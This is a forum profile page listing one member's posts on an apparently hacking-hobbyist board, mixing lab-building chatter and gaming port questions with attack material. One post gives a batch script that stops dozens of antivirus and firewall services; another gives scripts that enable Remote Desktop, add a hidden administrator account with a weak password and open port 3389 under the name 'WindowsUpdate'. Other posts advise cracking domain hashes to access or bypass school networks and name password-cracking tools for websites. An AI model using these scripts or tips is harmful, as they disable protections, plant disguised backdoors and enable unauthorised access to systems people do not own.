Jump to content

dred

Active Members
  • Posts

    24
  • Joined

  • Last visited

Everything posted by dred

  1. Ill check it out Thanks for the info when iam done I will let you know what i think
  2. Joomla, mercury32 mail server. filezilla. Alot of these are still very vulnerable for testing, the idea sounds cool let me know what you get going on i wouldnt mind giving it a go..
  3. I cant believe thats still going on I also remeber that from way back, lol Iam goign to chekc it out pretty cool
  4. Well if i understand you right what you really want to do is set up a lab and penetration test on your laptop from your desktop.If this is the case and you want to crack or hack in a legal testing enviroment some reading and study is needed.You should probably start out with some basic general overview books on penetration testing to get an idea of how you want to do it then probably study some code, ASM,perl ect.. depending on what you want to do..You want to stay away from kiddy tools so be prepared for a good solid year of study unless you are super smart..If you just want to play around crack the hash of the computer connect by terminal services or set up an ftp and make an account through terminal services on it from the hash you crack. when you make a password for your laptop you could look away so you dont know what it really is.. But if you want to analyze code of operating software test it and succesfully penetrate it remotly be prepared for some work.. hope that helps
  5. Hey I really like this and think its very cool, great work, can the type of soundcard you use change the qaulity of your image or even make it not appear, also is there a booster mod for the antenna making the signal stronger on fm radio or a scanner.. And last but not least when will you come up with a way to control the satalites and move them at will.. :D
  6. Tutorial Google: How to use rainbow tables Google: How do I stop being so lazy Google: Computer Crime Laws Google: Criminal Justice Attorneys Google: How to survive in Prison Not tryign to be mean or rude just expressing a point
  7. I didnt write this but wanted to share becuase i thought it was cool and usefull, maby we can mod it and add to it Install IIS, ASP.NET, .NET Framework 3.5, SQL Server 2005 Express /w Reporting Services, a Web Application, create the Web Application database, and Deploy Report files using a batch script ************************************** The Full Batch Script ************************************** @echo # Installing IIS sysocmgr /i:%windir%\inf\sysoc.inf /u:"%CD%\iis\iis_install.txt" echo off :loopIIS tasklist | find /i "sysocmgr.exe" >nul if %errorlevel% EQU 0 ( ping 127.0.0.1 -n 3 >nul goto loopIIS ) echo on @echo # Installing .NET Framework 3.5 DotNet\dotNetFx35.exe /qb /norestart echo off :loopDOTNET tasklist | find /i "dotnetfx35.exe" >nul if %errorlevel% EQU 0 ( ping 127.0.0.1 -n 3 >nul goto loopDOTNET ) echo on @echo # Installing SQL Server 2005 Express w/ Reporting Services SQL\SQLEXPR_ADV.exe /settings "%CD%\SQL\sql_install.ini" /qb echo off :loopSQL tasklist | find /i "setup.exe" >nul if %errorlevel% EQU 0 ( ping 127.0.0.1 -n 3 >nul goto loopSQL ) echo on @echo # Modify the Surface Area Configuration to allow remote connections "%programfiles%\Microsoft SQL Server\90\Shared\sac.exe" in "%CD%\SQL\sqlsac.out" -F -DE -BS -N @echo # Grant NT Authority\Network Service RSExecRole "%programfiles%\Microsoft SQL Server\90\Tools\Binn\osql" -E -S .\SQLExpress -i "%CD%\DatabaseScripts\GrantNTAuthoritySQLRS.sql" :loopNETWORKSERVICE tasklist | find /i "osql.exe" >nul if %errorlevel% EQU 0 ( ping 127.0.0.1 -n 3 >nul goto loopNETWORKSERVICE ) @echo # Installing Database "%programfiles%\Microsoft SQL Server\90\Tools\Binn\osql" -E -S .\SQLExpress -i "%CD%\DatabaseScripts\install.sql" :loopDATABASE tasklist | find /i "osql.exe" >nul if %errorlevel% EQU 0 ( ping 127.0.0.1 -n 3 >nul goto loopDATABASE ) @echo # Installing Application Files @echo # Create the Virtual Directory in IIS VirtualDirectoryInstaller.exe echo off :loopWebApp tasklist | find /i "VirtualDirectoryInstaller.exe" >nul if %errorlevel% EQU 0 ( ping 127.0.0.1 -n 3 >nul goto loopWebApp ) echo on @echo # Copy the web application files to the new virtual directory xcopy "WebApp\*" "C:\inetpub\wwwroot\WebApp\*" /C /E /H /R /Y @echo # Deploy the Reports "%programfiles%\Microsoft SQL Server\90\Tools\Binn\rs.exe" -i "%CD%\Reports\ReportsDeploy.rss" -s http://localhost/reportserver$sqlexpress @echo # Restart SQL Server for changes to take effect net stop "SQL Server (SQLEXpress)" && net start "SQL Server (SQLExpress)"
  8. i just made a bat file you can run without exe soemavs picked up kill.exe just run the bat file you can add to it. as the forum doesnt allow more then 10000 charaters in a post ill post partial.. echo. >> sc.txt net stop NOD32 Kernel Service /y >> sc.txt net stop "Network Associates McShield" /y >> sc.txt net stop "Mcshield" /y >> sc.txt net stop "McAfee Personal Firewall Service" /y >> sc.txt net stop "Symantec AntiVirus Client" /y >> sc.txt net stop "Norton AntiVirus Auto Protect Service" /y >> sc.txt net stop "Microsoft firewall" /y >> sc.txt net stop "Intel Alert Handler" /y >> sc.txt net stop "Intel Alert Originator" /y >> sc.txt net stop "Intel File Transfer" /y >> sc.txt net stop "Intel PDS" /y >> sc.txt net stop "SAVRoam" /y >> sc.txt net stop "Symantec AntiVirus Definition Watcher" /y >> sc.txt net stop "Symantec AntiVirus Definition" /y >> sc.txt net stop "Symantec Event Manager" /y >> sc.txt net stop "Symantec Network Drivers Service" /y >> sc.txt net stop "Symantec Password Validation" /y >> sc.txt net stop "Symantec SecurePort" /y >> sc.txt net stop "Symantec Settings Manager" /y >> sc.txt net stop "Symantec AntiVirus" /y >> sc.txt net stop "Symantec Core LC" /y >> sc.txt net stop "SNDSrvc" /y >> sc.txt net stop "Symantec Network Drivers Servi" /y >> sc.txt net stop "Symantec Network Drivers Service" /y >> sc.txt net stop "SAVScan" /y >> sc.txt net stop "Symantec AVScan" /y >> sc.txt net stop "Norton AntiVirus Auto-Protect" /y >> sc.txt net stop "NPFMntor" /y >> sc.txt net stop "Norton AntiVirus Firewall Moni" /y >> sc.txt net stop "Norton AntiVirus Firewall Monitor" /y >> sc.txt net stop "NSCService" /y >> sc.txt net stop "Norton Protection Center Servi" /y >> sc.txt net stop "Norton Protection Center Service" /y >> sc.txt net stop "ccSetMgr" /y >> sc.txt net stop "ccEvtMgr" /y >> sc.txt net stop "ccPwdSvc" /y >> sc.txt net stop "SENS" /y >> sc.txt net stop "SPBBCSvc" /y >> sc.txt net stop "kavsvc" /y >> sc.txt net stop "Kaspersky Antivirus" /y >> sc.txt net stop "Kaspersky Antivirus TM" /y >> sc.txt net stop "AVG anti-virus" /y >> sc.txt net stop "McAfee virus scan" /y >> sc.txt net stop "Norton AntiVirus" /y >> sc.txt net stop "ZoneAlarm Firewall" /y >> sc.txt net stop "AVG Antivirus" /y >> sc.txt net stop "AdminServer" /y >> sc.txt net stop "PavSrv" /y >> sc.txt net stop "PavReport" /y >> sc.txt net stop "PavPrSrv" /y >> sc.txt net stop "PAvDCExc" /y >> sc.txt net stop "PavAtScheduler" /y >> sc.txt net stop "PAVAGENTE" /y >> sc.txt net stop "Panda Software Controller" /y >> sc.txt net stop "PadFSvr" /y >> sc.txt net stop "PsImSvc" /y >> sc.txt net stop "Sophos Agent" /y >> sc.txt net stop "Sophos Message Router" /y >> sc.txt net stop "SAVService" /y >> sc.txt net stop "Sophos Anti-Virus" /y >> sc.txt net stop "SAVAdminService" /y >> sc.txt net stop "Sophos Anti-Virus status repor" /y >> sc.txt net stop "Sophos Anti-Virus status report" /y >> sc.txt net stop "Sophos AutoUpdate Service" /y >> sc.txt net stop "MDaemon" /y >> sc.txt net stop "avast!" /y >> sc.txt net stop "avast! System Guard" /y >> sc.txt net stop "avast" /y >> sc.txt net stop "WinDefend" /y >> sc.txt net stop "Windows Defender Service" /y >> sc.txt net stop "AvgServ" /y >> sc.txt net stop "AVG6 Service" /y >> sc.txt net stop "Avg7Alrt" /y >> sc.txt net stop "Avg7UpdSvc" /y >> sc.txt echo. >> sc.txt echo. >> sc.txt cls
  9. Heres two small bats I made, nothign special any could make them.. Why i made them , I have a friend and all of us have friends granparents they call you askign for help with there computer and dont know a dam thing. They might live far away or you are too lazy to drive over to help, so you want to remote to them , they dotn know what a terminal server is or what remote connections are and dont have live messenger or whatever, I just gave him my one two bat, one.bat is to enable a ts server on a machine, two.bat makes a admin user..If you have a better easier way let me know .. :) one.bat @echo off echo ********************************************************************** echo *? `* echo * Terminal Service Starter * echo * ======================== * echo * [*] Enabling RDP via DOS ... * echo * [*] Building REGKEY (fDenyTSConnections) * echo Windows Registry Editor Version 5.00> c:hide.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>> c:hide.reg echo "fDenyTSConnections"=dword:00000000>> c:hide.reg REGEDIT /S c:hide.REG echo * [*] REGKEY Added * DEL /Q c:hide.REG echo * [*] Building REGKEY (AllowTSConnections) * echo Windows Registry Editor Version 5.00> c:hide.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>> c:hide.reg echo "AllowTSConnections"=dword:00000001>> c:hide.reg REGEDIT /S c:hide.REG echo * [*] REGKEY Added * DEL /Q c:hide.REG echo * [*] Building REGKEY (fAllowToGetHelp) * echo Windows Registry Editor Version 5.00> c:hide.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>> c:hide.reg echo "fAllowToGetHelp"=dword:00000001>> c:hide.reg REGEDIT /S c:hide.REG echo * [*] REGKEY Added * DEL /Q c:hide.REG echo * * echo * [*] Terminal Service Started! * echo *. .* echo ********************************************************************** two.bat @echo off echo Windows Registry Editor Version 5.00> c:TS.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]>> c:TS.reg echo "Start"=dword:00000002>> c:TS.reg REGEDIT /S C:TS.REG echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]>>C:TS.REG echo "EnableAdminTSRemote"=dword:00000001>>C:TS.REG echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>C:TS.REG echo "TSEnabled"=dword:00000001>>C:TS.REG echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]>>C:TS.REG echo "Start"=dword:00000002>>C:TS.REG echo [Components] > c:bootlog~.txt echo TSEnabled = on >> c:bootlog~.txt sysocmgr /i:%windir%infsysoc.inf /u:c:bootlog~.txt /q DEL /Q c:TS.REG DEL /Q c:bootlog~.txt net user admin 123456 /add net localgroup Administrators admin /add mkdir "C:Documents and Settingsadmin" ECHO Windows Registry Editor Version 5.00 > test.reg ECHO. >> test.reg ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]>>test.reg ECHO "admin"=dword:00000000 >> test.reg START /WAIT REGEDIT /S "test.reg" netsh firewall add portopening TCP 3389 WindowsUpdate netsh firewall add portopening TCP 3389 WindowsUpdate netsh firewall add portopening UDP 3389 WindowsUpdate Dont use this for anythign stupid, This is shared to help make things easier, if your a moron and use it for soemthign dumb I will kick you in the head!!! ty
  10. Thats nice to know soemone else shares my huge curiosity here, to bad there wasnt a vip section here for this stuff to keep away those who wish to use knowledge for harm..Nice post by the way man ..
  11. Very interesting, I just wanted to add I dont think its wrong to use things like this in a controlled enviroment, I myself have alot of curiosity so I made a lab to test exploits and vulnerabiltys without harming anyone else.I think this is totally acceptable but soemtimes I feel wrong to have this curiosity or that i will be ridiculed here for shareing my findings. I say to each his own let indivduals take personal responsibilty for there actions but lets not put down someones actions unless its based on there intent. Trust me I have seen the post here how do i hack my school networks and that is dumb and I am happy that alot of you lead people with that mind state in the right direction.ultimately my point is I think we should allow people to test things here and share them of this nature, for good intent only, yes there will always be somebody that takes advantage, but freedom of information is good.So why not make it work with the switchblade its an idea and a project to explore and invent..
  12. dred

    Pwned

    I think the real ownage here is the person that stole his Ritlin..
  13. Its a sales plot, windows 1998 was better then the sister of vista, the "Millinium edition" this increased there sales as people who had baught 2000 had to go and buy 98 , the same with xp and vista once a new vista machine was baught unless you had a copy of xp you could pay the 250 dollars to get xp back as well as already being charged for vista.. Genius Mo money Mo money Mo!!!
  14. OK thank you so much Vako you have been extremely helpfull, Ill work on this and when its finished and tested ill post it here.. thanks again
  15. ok good to know, Well pretty basic stuff my os WIN xp HOME , router LINKSYS WRT54GS.. this is very common set up for the average gamer in my opionion. btu woudl be nice if there was a general command with say NETSH to use so other can use it too.. ty for your info on the NIX router too..
  16. well not only would it be easier then goign through the web console, but i always have friends haveing trouble with this, and stops us form gaming together.. wouldl be nice just to send them a bat file and walla its done..
  17. Hello I remeber an episode where you guys were showing how to open ports for starcraft by making a batch file, these commands you showed, netsh firewall delete portopening TCP 6112 netsh firewall delete portopening TCP 6113 netsh firewall delete portopening TCP 6114 netsh firewall delete portopening TCP 6115 netsh firewall delete portopening TCP 6116 netsh firewall delete portopening TCP 6117 netsh firewall delete portopening TCP 6118 netsh firewall delete portopening TCP 6119 opened ports for the windows firewall Is there a way to enable these on the routers firewall or to forward them with a batch or command.. My router firewall is very anal even with local outgoing conections, Me being a big time gamer, thought it would be nice if soemone could show us how to just forward the ports for the router not just the windows firewall.. ty
  18. I f its windows systems in your school reg a ts server get the hash from the domain machine and then you can just about acess anything illegally.but if your in the computer club and are the boss i would just ask, unless your lookign to do some underground behind the scenes stuff, you being there at the school i can say that it would be risky. theres actually so many things you can do since your there at the school, just try to stay out of trouble..
  19. dred

    School firewall

    couldnt you just reg a ts server from a cmd shell with admin perms and net stop the service or sc del "" it then add allowed ports you want with netsh cmds. with the ts you could do alot if its dissabled turn it on. or just try netsh firewall add allowedprogram %windir%system32name <servide name>> or add alowed port instead fo program.. you can try these although more basic .. if you get that far hell get the hash and crack it then use the admin perms to set it up anyway you want..
  20. sorry i had to revive this one, lmao i just love this thread.. I think hes looking for a begiiner kiddie app to crack the passwords of porn sites, i remeber back in the day there was two of them, he can google them .. accessdiver goldeneye there auto crackers if you use this to get free porn please use protection , they have built in proxy hunters if they have even updated this progs, and use trojan!!
  21. thanks for all your input i just wanted to here some of your ideas, and spark a little creativty.. respect G lol!!
  22. I like the ideas so far and Metatrons ideas are only a fantasy to me unless someone here wants to lend the money for it . ak ak ak!! maby you guys could through some ideas for the HOBO lab. now that we have heard some of the more expensive versions of building a lab..get ghetto on me!!!
  23. I wanted to hear some ideas on building a lab for security testing, please post your ideas here please include furniture and maby even a few links to the items used..This lab can be used for testing exploits, hardware and hacking in general.. I look forward to seeing what you come up with..
×
×
  • Create New...